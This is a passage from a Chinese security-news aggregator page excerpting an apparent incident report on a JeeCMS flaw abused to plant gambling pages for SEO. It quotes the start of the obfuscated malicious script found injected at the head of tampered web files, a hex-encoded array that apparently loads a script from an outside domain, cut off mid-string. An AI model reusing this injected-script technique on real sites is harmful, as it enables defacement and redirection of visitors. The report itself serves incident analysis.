记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

JeeCMS漏洞竟沦为黑产SEO的秘密武器?

背景概述近日深信服安全感知平台发现客户服务器中的文件被篡改,植入博彩页面。经深信服安全团队排查,发现大量网页文件被篡改,且被篡改的时间非常密集,如下图所示在2019年3月26日 16:46左右网站目录下产生大量恶意文件。入侵分析排查篡改目录下最早被篡改的文件,创建时间为2019年3月14日13:53。排查被篡改的网站文件,均在头部位置发现了恶意代码,如下图所示:恶意代码内容如下:<script>var _0x150a=["x3Cx73x63x72x69x70x74x20x73x72x63x3Dx27x68x74x74x70x3Ax2Fx2Fx61x74x61x70x69x38x38x38
发布时间:2019-04-10 17:25 | 阅读:39643 | 评论:0 | 标签:漏洞 JeeCMS cms

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云